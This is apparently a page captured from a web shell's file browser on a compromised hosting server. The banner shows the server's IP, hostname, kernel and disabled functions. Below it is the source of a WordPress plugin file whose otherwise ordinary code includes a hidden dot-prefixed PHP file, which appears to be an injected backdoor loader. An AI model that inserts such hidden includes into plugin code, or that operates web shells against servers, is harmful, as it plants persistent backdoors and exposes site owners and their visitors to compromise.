uawdijnntqw1x1x1
IP : 18.117.252.33
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
.caldav
/
..
/
www
/
wp-content
/
plugins
/
imic-shortcodes
/
shortcodes.php
/
/
<?php /* * Plugin Name: imic Shortcodes * Plugin URI: http://www.imithemes.com * Description: Add shortcode generator to posts editor * Author: imithemes * Version: 1.2 * Author URI: http://www.imithemes.com * Licence: GPLv2 * License URI: http://www.gnu.org/licenses/gpl-2.0.html * Text Domain: imithemes-shortcodes * Domain Path: /language */ // Do not allow direct access to this file. defined( 'ABSPATH' ) or die( 'No script kiddies please!' ); $path = plugin_dir_path( __FILE__ ); //Load language text domain add_action('after_setup_theme', 'imic_imithemes_shortcode_setup'); if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } function imic_imithemes_shortcode_setup() { load_theme_textdomain('imithemes-shortcodes', plugin_dir_path( __FILE__ ) . '/language'); } /* CUSTOM SHORTCODES FUNCTIONS ================================================== */ require_once $path . '/shortcodes-functions.php';
/home/batcwwjx/.caldav/../www/wp-content/plugins/imic-shortcodes/shortcodes.php